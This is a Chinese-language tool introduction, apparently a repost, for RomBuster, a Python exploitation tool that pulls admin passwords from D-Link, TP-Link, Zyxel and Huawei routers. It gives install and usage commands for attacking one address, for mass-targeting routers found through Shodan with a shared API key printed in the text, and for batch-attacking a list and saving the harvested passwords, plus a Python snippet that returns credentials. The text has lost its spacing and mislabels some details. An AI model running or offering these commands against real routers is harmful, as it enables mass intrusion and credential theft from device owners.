关于RomBusterRomBuster是一款强大的网络路由器漏洞利用工具,可以帮助研究人员分析网络路由器的安全性,获取管理目标路由器的用户密码。功能能够利用大多数流行路由器中的安全漏洞,例如D-Link、Zyxel、TP-Link和华为等。优化以从列表中读取多个目标路由器以进行安全分析和漏洞利用。简单的命令行界面和API用法。工具安装由于RomBuster是使用Python3开发的,因此首先需要在本地设备上安装配置Python3环境。接下来,研究人员可以使用如下命令下载安装RomBuster:pip3installgit+https://github.com/EntySec/RomBusterRomBuster的基本使用非常简单,我们只需要在RomBuster命令行终端输入“rombuster”命令即可可以使用:usage:rombuster[-h][-oOUTPUT][-iINPUT][-aADDRESS][--shodanSHODAN][--zoomeyeZOOMEYE][-pPAGES]RomBusterisarouterexploitationtoolthatallowstodisclosurenetworkrouteradminpassword.optionalarguments:-h,--help显示这个帮助信息并退出-oOUTPUT,--outputOUTPUT将结果存储到文件-iINPUT,--inputINPUT地址列表输入文件-aADDRESS,--addressADDRESS提供单个地址--shodanSHODAN利用网络上远程设备使用的ShodanAPI密钥--zoomeyeZOOMEYE通过网络使用远程设备使用的ZoomEyeAPI密钥-pPAGES,--pagesPAGES需要通过ZoomEye获取的页面数工具使用示例(一)攻击单个路由器下面的命令可以攻击一个单lenetworkrouter:rombuster-a192.168.99.1(2)通过网络攻击远程路由器接下来,我们可以使用Shodan搜索引擎搜索并攻击网络上的路由器:rombuster--shodanPSKINdQe1GyxGgecYz2191H2JoS9qvgD注意:ShodanAPI密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgDo)项目中给出的是开发者自己的专业VersionAPIkey,可以使用自己的key,当然如果想用开发者的key也没问题,大家共享资源!(3)从输入文件中获取目标路由器我们也可以使用开放数据库中提供的摄像头地址:rombuster-routers.txt-opasswords.txt注意:该命令会攻击routers.txt中给出的所有摄像头,并会删除所有获得的密码存储在passwords.txt文件中的APIRomBuster也提供了自己的PythonAPI,可以导入到自己的项目代码中调用其函数:fromrombusterimportRomBuster(1)基本函数下面是RomBuster支持的基本函数,可以用来利用指定路由器的安全漏洞:exploit(address):attackasinglerouterwiththespecifiedaddress(2)调用sample攻击单个路由器:fromrombusterimportRomBusterrombuster=RomBuster()creds=rombuster.exploit('192.168.99.1')print(creds)项目地址RomBuster:[GitHub传送门]
